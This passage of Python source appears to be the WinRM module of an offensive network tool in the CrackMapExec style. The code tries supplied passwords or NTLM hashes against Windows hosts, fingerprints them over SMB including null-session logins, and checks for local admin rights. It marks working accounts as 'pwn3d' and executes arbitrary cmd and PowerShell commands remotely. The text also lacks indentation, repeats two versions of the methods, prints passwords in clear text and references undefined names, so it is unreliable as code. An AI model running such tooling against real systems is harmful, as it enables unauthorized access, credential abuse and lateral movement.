'hostname': self.hostname})
def enum_host_info(self):
#smb_conn = SMBConnection(self.host, self.host, None)
#
#try:
# smb_conn.login('' , '')
#except SessionError as e:
# if "STATUS_ACCESS_DENIED" in str(e):
# pass
#
#self.domain = smb_conn.getServerDomain()
#self.hostname = smb_conn.getServerName()
#self.server_os = smb_conn.getServerOS()
#self.signing = smb_conn.isSigningRequired()
#self.os_arch = smb_conn.get_os_arch()
#
#self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
#
#if not self.domain:
# self.domain = self.hostname
#
#self.db.add_computer(self.host, self.hostname, self.domain, self.server_os)
#
#try:
# ''' DC's seem to want us to logoff first, windows workstations sometimes reset the connection
# '''
# smb_conn.logoff()
#except:
# pass
#
#if self.args.domain:
# self.domain = self.args.domain
#
#if self.args.local_auth:
# self.domain = self.hostname
print('todo')
def print_host_info(self):
#>>> s.__dict__
# {'url': 'http://win10a.ocean.depth:5985/wsman', 'protocol': <winrm.protocol.Protocol object at 0x7f7ae595f110>}
#>>> s.protocol.__dict__
# {'read_timeout_sec': 30, 'operation_timeout_sec': 20, 'max_env_sz': 153600, 'locale': 'en-US', 'transport': <winrm.transport.Transport object at 0x7f7ae60a7f50>, 'username': '******', 'password': '******', 'service': 'HTTP', 'keytab': None, 'ca_trust_path': None, 'server_cert_validation': 'validate', 'kerberos_delegation': False, 'kerberos_hostname_override': None, 'credssp_disable_tlsv1_2': False}
#
self.logger.info("{}".format(self.conn.url))
def create_conn_obj(self):
#pywinrm will try and guess the correct endpoint url: https://pypi.org/project/pywinrm/0.2.2/
print('pass={}'.format(self.args.password))
self.conn = pywinrm.Session(self.host,
auth=('{}\\{}'.format(self.domain, self.args.username[0]), self.args.password[0]),
transport='ntlm',
server_cert_validation='ignore')
return True
def plaintext_login(self, domain, username, password):
try:
self.conn.run_cmd('hostname')
self.admin_privs = True
out = '{}\\{}:{} {}'.format(domain,
username,
password,
highlight('({})'.format(cfg.pwn3d_label) if self.admin_privs else ''))
self.logger.success(out)
if not self.args.continue_on_success:
return True
except SessionError as e:
error, desc = e.getErrorString()
self.logger.error('{}\\{}:{} {} {}'.format(domain,
username,
password,
error,
'({})'.format(desc) if self.args.verbose else ''))
if error == 'STATUS_LOGON_FAILURE': self.inc_failed_login(username)
return False
def parse_output(self, response_obj):
if response_obj.status_code == 0:
buf = StringIO(response_obj.std_out).readlines()
for line in buf:
self.logger.highlight(line.decode('utf-8').strip())
return response_obj.std_out
else:
buf = StringIO(response_obj.std_err).readlines()
for line in buf:
self.logger.highlight(line.decode('utf-8').strip())
return response_obj.std_err
def execute(self, payload=None, get_output=False):
r = self.conn.run_cmd(self.args.execute)
self.logger.success('Executed command')
self.parse_output(r)
def ps_execute(self, payload=None, get_output=False):
r = self.conn.run_ps(self.args.ps_execute)
self.logger.success('Executed command')
self.parse_output(r)
class winrm(connection):
def __init__(self, args, db, host):
self.domain = None
self.port = ' '
self.server_os = None
self.os_arch = 0
self.hash = None
self.lmhash = ''
self.nthash = ''
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv = None
self.signing = False
self.smb_share_name = smb_share_name
self.debug = args.debug
self.dc_ip = args.domaincontroller
self.domain_dns = None
connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
winrm_parser = parser.add_parser('winrm',
help="own stuff using WINRM",
parents=[std_parser, module_parser])
winrm_parser.add_argument(
"-H",
'--hash',
metavar="HASH",
dest='hash',
nargs='+',
default=[],
help='NTLM hash(es) or file(s) containing NTLM hashes')
winrm_parser.add_argument("-smbport",
"--smbport",
type=int,
choices={445, 139},
default=445,
help="SMB port (default: 445)")
winrm_parser.add_argument("-dc",
'--domaincontroller',
type=str,
default='',
help='the IP of a domain controller')
auth_group = winrm_parser.add_mutually_exclusive_group()
auth_group.add_argument("-d",
metavar="DOMAIN",
dest='domain',
type=str,
default=None,
help="domain to authenticate to")
auth_group.add_argument("--local-auth",
action='store_true',
help='authenticate locally to each target')
command_group = winrm_parser.add_argument_group(
"Command Execution", "Options for executing commands")
command_group.add_argument('--no-output',
action='store_true',
help='do not retrieve command output')
command_group.add_argument("-x",
metavar="COMMAND",
dest='execute',
help="execute the specified command")
command_group.add_argument(
"-X",
metavar="PS_COMMAND",
dest='ps_execute',
help='execute the specified PowerShell command')
return parser
def proto_logger(self):
self.logger = CMXLogAdapter(
extra={
'protocol': 'WinRM',
'host': ('->' + self.host),
'port': self.port,
'hostname': self.hostname
})
#self.options.logger = self.logger
def enum_host_info(self):
"""Fingerprint host via smb connection.
Grabs info prior to unauthenticated
"""
# self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
try:
self.smbconn.login('', '')
logging.debug("Null login?")
self.logger.success('Null login allowed')
except impacket.smbconnection.SessionError as e:
if "STATUS_ACCESS_DENIED" in str(e):
logging.debug("Null login not allowed")
pass
self.domain = self.smbconn.getServerDomain() # OCEAN
self.hostname = self.smbconn.getServerName() # WIN7-PC
self.server_os = self.smbconn.getServerOS() # WIndows 6.1 Build 7601
self.signing = self.smbconn.isSigningRequired() # True/false
self.os_arch = self.get_os_arch() # 64
self.domain_dns = self.smbconn.getServerDNSDomainName() # ocean.depth
self.logger.hostname = self.hostname
dialect = self.smbconn.getDialect()
# print (self.conn.getServerDomain()) # OCEAN
# print (self.conn.getServerName()) # WIN7-PC
# print (self.conn.getServerOS()) # WIndows 6.1 Build 7601
# print (self.conn.isSigningRequired()) # True
# print (self.get_os_arch()) # 64
# print (self.conn.getDialect()) # 528
# print (self.conn.getRemoteHost()) # IPaddress
# print (self.conn.getRemoteName()) # win7-pc
# print (self.conn.getServerDNSDomainName()) # ocean.depth
# print (self.conn.getServerOSMajor()) # 6
# print (self.conn.getServerOSMinor()) # 1
# print (self.conn.getServerOSBuild()) # 7601
# print (self.conn.doesSupportNTLMv2()) # True
# print (self.conn.isLoginRequired()) # True
if dialect == impacket.smb.SMB_DIALECT:
self.smbv = '1'
logging.debug("SMBv1 dialect used")
elif dialect == impacket.smb3structs.SMB2_DIALECT_002:
self.smbv = '2.0'
logging.debug("SMBv2.0 dialect used")
elif dialect == impacket.smb3structs.SMB2_DIALECT_21:
self.smbv = '2.1'
logging.debug("SMBv2.1 dialect used")
elif dialect == impacket.smb3structs.SMB2_DIALECT_30:
self.smbv = '3.0'
logging.debug("SMBv3.0 dialect used")
elif dialect == impacket.smb3structs.SMB2_DIALECT_302:
self.smbv = '3.0.2'
logging.debug("SMBv3.0.2 dialect used")
elif dialect == impacket.smb3structs.SMB2_DIALECT_311:
self.smbv = '3.1.1'
logging.debug("SMBv3.1.1 dialect used")
else:
self.smbv = '??'
logging.debug("SMB version couldnt be determined?")
# Get the DC if we arent local-auth and didnt specify
if not self.args.local_auth and self.dc_ip == '':
self.dc_ip = self.smbconn.getServerDNSDomainName()
if self.args.domain:
self.domain = self.args.domain
if not self.domain:
self.domain = self.hostname
self.db.add_computer(self.host, self.hostname, self.domain,
self.server_os)
try:
''' DC's seem to want us to logoff first, windows workstations sometimes reset the connection
'''
self.smbconn.logoff()
except:
pass
if self.args.local_auth:
self.domain = self.hostname
self.output_filename = '{}/{}_{}_{}'.format(
cfg.LOGS_PATH, self.hostname, self.host,
datetime.now().strftime("%Y-%m-%d_%H%M%S"))
#Re-connect since we logged off
self.create_conn_obj()
def print_host_info(self):
"""Format help for host info."""
self.logger.announce("{}{} (domain:{}) (signing:{}) (SMBv:{})".format(
self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '', self.domain,
self.signing, self.smbv))
self.logger.announce('Targetting: {}'.format(self.endpoint))
def create_smbv1_conn(self):
"""Setup connection using smbv1."""
try:
logging.debug('Attempting SMBv1 connection to {}'.format(
self.host))
self.smbconn = impacket.smbconnection.SMBConnection(
self.host, self.host, None, self.args.smbport
) #, preferredDialect=impacket.smb.SMB_DIALECT)
except socket.error as e:
if str(e).find('Connection reset by peer') != -1:
logging.debug(
'Connection was reset by target. SMBv1 might be disabled on {}'
.format(self.host))
elif str(e).find('No route to host') != -1:
logging.debug(
'Could not connect to {}, no route to host. Can you ping it?'
.format(self.host))
else:
logging.debug(
'Something went wrong, Could not connect to {}, tried smbv1'
.format(self.host))
return False
except Exception as e:
logging.debug('Error creating SMBv1 connection to {}: {}'.format(
self.host, e))
return False
logging.debug('Connected using SMBv1 to: {}'.format(self.host))
return True
def create_smbv3_conn(self):
"""Setup connection using smbv3.
Used for both SMBv2 and SMBv3
"""
try:
logging.debug('Attempting SMBv3 connection to {}'.format(
self.host))
self.smbconn = impacket.smbconnection.SMBConnection(
self.host, self.host, None, self.args.smbport)
except socket.error as e:
if str(e).find('No route to host') != -1:
logging.debug('No route to host {}'.format(self.host))
self.logger.announce(
'Could not connect to {}, no route to host. Can you ping it?'
.format(self.host))
else:
logging.debug(
'Something went wrong, Could not connect to {}, tried smbv3'
.format(self.host))
return False
except Exception as e:
logging.debug('Error creating SMBv3 connection to {}: {}'.format(
self.host, e))
return False
logging.debug('Connected using SMBv3 to: {}'.format(self.host))
return True
def create_conn_obj(self):
#first figure out winrm endpoint -- could mabye just make them choose with/without SSL
endpoints = [
'https://{}:5986/wsman'.format(self.host),
'http://{}:5985/wsman'.format(self.host)
]
for url in endpoints:
try:
requests.get(url, verify=False, timeout=10)
self.endpoint = url
if self.endpoint.startswith('https://'):
self.port = 5986
else:
self.port = 5985
self.logger.extra['port'] = self.port
except Exception as e:
if 'Max retries exceeded with url' not in str(e):
logging.debug('Error in WinRM create_conn_obj:' + str(e))
#then we build an smb connection to grab some hostinfo -
# - could maybe not do this and use output from winrm connection to get some info?
if self.create_smbv1_conn():
return True
elif self.create_smbv3_conn():
return True
return False
###############################################################################
# ####### ##### ### # #
# # # # # # ## #
# # # # # # # #
# # # # #### # # # #
# # # # # # # # #
# # # # # # # ##
####### ####### ##### ### # #
###############################################################################
def plaintext_login(self, domain, username, password):
try:
# pywinrm session class defined here :
# https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py
self.conn = pywinrm.Session(self.host,
auth=('{}\\{}'.format(
domain, username), password),
transport='ntlm',
server_cert_validation='ignore')
# session = winrm.Session(host, auth=('{}@{}'.format(user,domain), password), transport='ntlm')
# need to remove smb connection stuff and only use winrm
self.smbconn.login(username, password, domain)
self.password = password
self.username = username
self.domain = domain
# using smb method until the warnings get fixed for urllib, just to cut down on warnings from execute
self.admin_privs = self.check_if_admin()
#r = self.conn.run_cmd('hostname')
# self.parse_output(r)
self.admin_privs = True
self.logger.success('{}\\{}:{} {}'.format(
domain, username, password,
highlight('({})'.format(cfg.pwn3d_label) if self.
admin_privs else '')))
return True
except Exception as e:
self.logger.error('{}\\{}:{} "{}"'.format(domain, username,
password, e))
return False
###############################################################################
####### # # ####### ##### # # ####### #######
# # # # # # # # # #
# # # # # # # # #
##### # ##### # # # # #####
# # # # # # # # #
# # # # # # # # # #
####### # # ####### ##### ##### # #######
###############################################################################
def execute(self, payload=None, get_output=False):
# run_cmd returns a Response() object
# Response() object defined here: https://github.com/diyan/pywinrm/blob/master/winrm/__init__.py
r = self.conn.run_cmd(self.args.execute)
self.logger.success('Executed command')
# result = session.run_cmd('ipconfig', ['/all']) # To run command in cmd
# result = session.run_ps('Get-Acl') # To run Powershell block
self.parse_output(r)
def ps_execute(self, payload=None, get_output=False):
r = self.conn.run_ps(self.args.ps_execute)
self.logger.success('Executed command')
self.parse_output(r)
####################################################################################
# # ####### # ###### ####### ###### #####
# # # # # # # # # # #
# # # # # # # # # #
####### ##### # ###### ##### ###### #####
# # # # # # # # #
# # # # # # # # # #
# # ####### ####### # ####### # # #####
####################################################################################
def parse_output(self, response_obj):
if response_obj.status_code == 0:
buf = StringIO(str(response_obj.std_out, 'UTF-8')).readlines()
for line in buf:
self.logger.highlight(line)
return response_obj.std_out
else:
buf = StringIO(str(response_obj.std_err, 'UTF-8')).readlines()
for line in buf:
self.logger.highlight(line)
return response_obj.std_err
def check_if_admin(self):
"""Check for localadmin privs.
Checked by view all services for sc_manager_all_access
Returns:
True if localadmin
False if not localadmin
"""
try:
rpctransport = impacket.dcerpc.v5.transport.SMBTransport(
self.host, 445, r'\svcctl', smb_connection=self.smbconn)
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
logging.debug('localadmin Binding start')
dce.bind(impacket.dcerpc.v5.scmr.MSRPC_UUID_SCMR)
try:
# 0xF003F - SC_MANAGER_ALL_ACCESS
# this val comes from https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights
# https://github.com/SecureAuthCorp/impacket/blob/master/impacket/dcerpc/v5/scmr.py
logging.debug('Verify localadmin via ServicesActive...')
ans = impacket.dcerpc.v5.scmr.hROpenSCManagerW(
dce, '{}\x00'.format(self.hostname),
'ServicesActive\x00', 0xF003F)
logging.debug('pewpewpewPwned baby')
dce.disconnect()
return True
except impacket.dcerpc.v5.rpcrt.DCERPCException:
logging.debug('a {}'.format(str(e)))
dce.disconnect()
pass
except impacket.dcerpc.v5.rpcrt.DCERPCException as e:
logging.debug('b {}'.format(str(e)))
dce.disconnect()
return False
except Exception:
logging.debug('Something went wrong ... Not localadmin :( ')
dce.disconnect()
return False
dce.disconnect()
return False
def get_os_arch(self):
"""Identify OS architecture.
Returns either 32 or 64
"""
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
rpctransport = impacket.dcerpc.v5.transport.DCERPCTransportFactory(
stringBinding)
rpctransport.set_connect_timeout(5)
dce = rpctransport.get_dce_rpc()
dce.connect()
try:
dce.bind(
impacket.dcerpc.v5.epm.MSRPC_UUID_PORTMAP,
transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36',
'1.0'))
except impacket.dcerpc.v5.rpcrt.DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug(
'Error retrieving os arch of {}: {} using x64'.format(
self.host, str(e)))
try:
dce.disconnect()
except impacket.dcerpc.v5.rpcrt.DCERPCException as e:
pass
return 64